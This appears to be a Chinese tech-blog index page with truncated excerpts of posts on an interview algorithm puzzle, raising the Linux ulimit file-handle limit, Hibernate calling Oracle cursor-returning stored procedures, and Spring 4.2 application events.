           在面试机试时,遇到一个算法题,当时没能写出来,最后是同学帮忙解决的。        这道题大致意思是:输入一个数,比如4,。这时会输出:           &n
  • 正确配置Linux系统ulimit值 字符串 ulimit
    在Linux下面部 署应用的时候,有时候会遇上Socket/File: Can’t open so many files的问题;这个值也会影响服务器的最大并发数,其实Linux是有文件句柄限制的,而且Linux默认不是很高,一般都是1024,生产服务器用 其实很容易就达到这个数量。下面说的是,如何通过正解配置来改正这个系统默认值。因为这个问题是我配置Nginx+php5时遇到了,所以我将这篇归纳进
  • hibernate调用返回游标的存储过程 Supanccy2013 javaDAOoracleHibernatejdbc
    注:原创作品,转载请注明出处。     上篇博文介绍的是hibernate调用返回单值的存储过程,本片博文说的是hibernate调用返回游标的存储过程。     此此扁博文的存储过程的功能相当于是jdbc调用select 的作用。 1,创建oracle中的包,并在该包中创建的游标类型。 ---创建oracle的程
  • Spring 4.2新特性-更简单的Application Event wiselyman application
    1.1 Application Event Spring 4.1的写法请参考10点睛Spring4.1-Application Event 请对比10点睛Spring4.1-Application Event 使用一个@EventListener取代了实现ApplicationListener接口,使耦合度降低; 1.2 示例 包依赖 <p